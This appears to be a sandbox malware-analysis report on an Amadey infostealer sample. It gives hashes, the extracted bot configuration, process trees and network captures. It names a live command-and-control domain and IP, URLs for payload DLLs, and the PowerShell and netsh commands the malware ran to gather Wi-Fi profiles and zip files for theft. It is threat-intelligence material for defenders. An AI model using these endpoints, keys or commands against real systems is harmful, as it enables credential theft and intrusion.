Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    295s
  • max time network
    242s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    15/03/2024, 04:50 UTC

General

  • Target

    c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b.exe

  • Size

    388KB

  • MD5

    0de19cd17462ea79db1a5e5fd1d7f59f

  • SHA1

    d2b313dcfbda9a04475fc01182336b52846bbe3b

  • SHA256

    c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b

  • SHA512

    0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

  • SSDEEP

    6144:xw5S4d8nVyt7UcbfbXoAZvKAHiq7bSVXVU/OooMQEqChuiTAOxiMd:+5B/Uczb4AZvKAHuO/YEJus

Malware Config

Extracted

Family

amadey

Version

4.18

Attributes
  • install_dir

    154561dcbf

  • install_file

    Dctooux.exe

  • strings_key

    2cd47fa043c815e1a033c67832f3c6a5

  • url_paths

    /j4Fvskd3/index.php

rc4.plain
1
810b84e2bfa3a9e2d0d81a3d2ea89e46

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 19 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b.exe
    "C:\Users\Admin\AppData\Local\Temp\c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
      "C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main
        3⤵
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:584
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\SysWOW64\rundll32.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 208
            5⤵
            • Program crash
            PID:2748
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2436
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            5⤵
              PID:2680
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\780967622241_Desktop.zip' -CompressionLevel Optimal
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1232
        • C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
          "C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
          3⤵
            PID:2668
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
            3⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            PID:1628

      Network

      • flag-us
        DNS
        topgamecheats.dev
        rundll32.exe
        Remote address:
        8.8.8.8:53
        Request
        topgamecheats.dev
        IN A
        Response
        topgamecheats.dev
        IN A
        93.123.39.96
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 4
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        refresh: 0; url = Login.php
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:50:45 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 156
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:50:45 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        GET
        http://topgamecheats.dev/blyat.dll
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        GET /blyat.dll HTTP/1.1
        Host: topgamecheats.dev
        Response
        HTTP/1.1 200 OK
        content-type: application/octet-stream
        last-modified: Thu, 14 Mar 2024 20:14:06 GMT
        etag: "65f35a8e-24e000"
        accept-ranges: bytes
        content-length: 2416640
        date: Fri, 15 Mar 2024 04:50:45 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 31
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:50:54 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php?scr=1 HTTP/1.1
        Content-Type: multipart/form-data; boundary=----NzI3Nzk=
        Host: topgamecheats.dev
        Content-Length: 72931
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:50:48 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        GET
        http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1
        Host: topgamecheats.dev
        Response
        HTTP/1.1 200 OK
        content-type: application/octet-stream
        last-modified: Mon, 11 Mar 2024 21:14:27 GMT
        etag: "65ef7433-139e00"
        accept-ranges: bytes
        content-length: 1285632
        date: Fri, 15 Mar 2024 04:50:52 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        GET
        http://topgamecheats.dev/updatecrypt.exe
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        GET /updatecrypt.exe HTTP/1.1
        Host: topgamecheats.dev
        Response
        HTTP/1.1 200 OK
        content-type: application/octet-stream
        last-modified: Thu, 14 Mar 2024 20:12:59 GMT
        etag: "65f35a4b-61000"
        accept-ranges: bytes
        content-length: 397312
        date: Fri, 15 Mar 2024 04:50:54 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 31
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:50:55 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        rundll32.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 21
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:50:57 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        GET
        http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1
        Host: topgamecheats.dev
        Response
        HTTP/1.1 200 OK
        content-type: application/octet-stream
        last-modified: Mon, 11 Mar 2024 21:14:32 GMT
        etag: "65ef7438-1b600"
        accept-ranges: bytes
        content-length: 112128
        date: Fri, 15 Mar 2024 04:51:07 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        rundll32.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 5
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:51:08 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php?scr=1 HTTP/1.1
        Content-Type: multipart/form-data; boundary=----ODc2NDE=
        Host: topgamecheats.dev
        Content-Length: 87793
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:53:53 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 4
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        refresh: 0; url = Login.php
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:53:56 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • flag-bg
        POST
        http://topgamecheats.dev/j4Fvskd3/index.php
        Dctooux.exe
        Remote address:
        93.123.39.96:80
        Request
        POST /j4Fvskd3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: topgamecheats.dev
        Content-Length: 156
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        content-type: text/html; charset=UTF-8
        transfer-encoding: chunked
        date: Fri, 15 Mar 2024 04:53:56 GMT
        server: LiteSpeed
        connection: Keep-Alive
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php
        http
        Dctooux.exe
        62.6kB
        2.5MB
        1231
        1793

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200

        HTTP Request

        GET http://topgamecheats.dev/blyat.dll

        HTTP Response

        200

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
        http
        Dctooux.exe
        509.6kB
        115.0kB
        9611
        1949

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php?scr=1

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php
        http
        Dctooux.exe
        34.9kB
        1.7MB
        722
        1255

        HTTP Request

        GET http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll

        HTTP Response

        200

        HTTP Request

        GET http://topgamecheats.dev/updatecrypt.exe

        HTTP Response

        200

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php
        http
        rundll32.exe
        403 B
        346 B
        5
        4

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll
        http
        Dctooux.exe
        3.0kB
        115.9kB
        63
        87

        HTTP Request

        GET http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php
        http
        rundll32.exe
        712 B
        424 B
        12
        5

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
        http
        Dctooux.exe
        483.3kB
        107.0kB
        8621
        1897

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php?scr=1

        HTTP Response

        200
      • 93.123.39.96:80
        http://topgamecheats.dev/j4Fvskd3/index.php
        http
        Dctooux.exe
        830 B
        719 B
        8
        8

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200

        HTTP Request

        POST http://topgamecheats.dev/j4Fvskd3/index.php

        HTTP Response

        200
      • 8.8.8.8:53
        topgamecheats.dev
        dns
        rundll32.exe
        63 B
        79 B
        1
        1

        DNS Request

        topgamecheats.dev

        DNS Response

        93.123.39.96

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

        Filesize

        2.3MB

        MD5

        cb253bf8a6859eadd30b4ceb66c6a588

        SHA1

        7e9383d51ec36a019b5884f79a2ac2c05b4049bd

        SHA256

        03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722

        SHA512

        1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061

      • C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

        Filesize

        388KB

        MD5

        0de19cd17462ea79db1a5e5fd1d7f59f

        SHA1

        d2b313dcfbda9a04475fc01182336b52846bbe3b

        SHA256

        c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b

        SHA512

        0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

      • C:\Users\Admin\AppData\Local\Temp\780967622241

        Filesize

        71KB

        MD5

        6d18603c05d87cb3d93c6dec9093e93d

        SHA1

        39d159a332debbc9b4dd2724720cd39c4209eca2

        SHA256

        4030c1e72975a3368adfcd2375a65e460129ab726d3c1b36e473f437d4964302

        SHA512

        1e996778d6b6601254991328c116b9694f2e78b28ea70e04cee1bb4cbe6ec2b903a32ec912f929564d6c0db469c40b72c11cfb553d0c1a0cbb572dc42f860bab

      • C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

        Filesize

        109KB

        MD5

        ca684dc5ebed4381701a39f1cc3a0fb2

        SHA1

        8c4a375aa583bd1c705597a7f45fd18934276770

        SHA256

        b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2

        SHA512

        8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510

      • C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

        Filesize

        1.2MB

        MD5

        4876ee75ce2712147c41ff1277cd2d30

        SHA1

        3733dc92318f0c6b92cb201e49151686281acda6

        SHA256

        bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed

        SHA512

        9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9

      • memory/584-100-0x0000000010000000-0x0000000010253000-memory.dmp

        Filesize

        2.3MB

      • memory/584-101-0x00000000000F0000-0x00000000000FA000-memory.dmp

        Filesize

        40KB

      • memory/584-82-0x0000000010000000-0x0000000010253000-memory.dmp

        Filesize

        2.3MB

      • memory/584-81-0x0000000010000000-0x0000000010253000-memory.dmp

        Filesize

        2.3MB

      • memory/584-99-0x0000000010000000-0x0000000010253000-memory.dmp

        Filesize

        2.3MB

      • memory/584-106-0x0000000010000000-0x0000000010253000-memory.dmp

        Filesize

        2.3MB

      • memory/584-103-0x0000000010000000-0x0000000010253000-memory.dmp

        Filesize

        2.3MB

      • memory/1232-75-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/1232-72-0x000000001B410000-0x000000001B6F2000-memory.dmp

        Filesize

        2.9MB

      • memory/1232-73-0x0000000000590000-0x0000000000598000-memory.dmp

        Filesize

        32KB

      • memory/1232-74-0x000007FEF4D70000-0x000007FEF570D000-memory.dmp

        Filesize

        9.6MB

      • memory/1232-76-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/1232-77-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/1232-78-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/1232-79-0x000007FEF4D70000-0x000007FEF570D000-memory.dmp

        Filesize

        9.6MB

      • memory/1608-102-0x0000000000110000-0x0000000000182000-memory.dmp

        Filesize

        456KB

      • memory/1608-107-0x0000000000110000-0x0000000000182000-memory.dmp

        Filesize

        456KB

      • memory/1608-104-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/1608-109-0x0000000000110000-0x0000000000182000-memory.dmp

        Filesize

        456KB

      • memory/1608-111-0x0000000000110000-0x0000000000182000-memory.dmp

        Filesize

        456KB

      • memory/2780-1-0x00000000005E0000-0x00000000006E0000-memory.dmp

        Filesize

        1024KB

      • memory/2780-5-0x00000000005B0000-0x00000000005B1000-memory.dmp

        Filesize

        4KB

      • memory/2780-19-0x0000000000220000-0x000000000028F000-memory.dmp

        Filesize

        444KB

      • memory/2780-17-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2780-2-0x0000000000220000-0x000000000028F000-memory.dmp

        Filesize

        444KB

      • memory/2780-18-0x00000000005E0000-0x00000000006E0000-memory.dmp

        Filesize

        1024KB

      • memory/2780-3-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2860-71-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2860-33-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2860-83-0x0000000000570000-0x0000000000670000-memory.dmp

        Filesize

        1024KB

      • memory/2860-22-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2860-21-0x0000000000570000-0x0000000000670000-memory.dmp

        Filesize

        1024KB

      • memory/2860-97-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2860-130-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      • memory/2860-136-0x0000000000400000-0x00000000004AB000-memory.dmp

        Filesize

        684KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.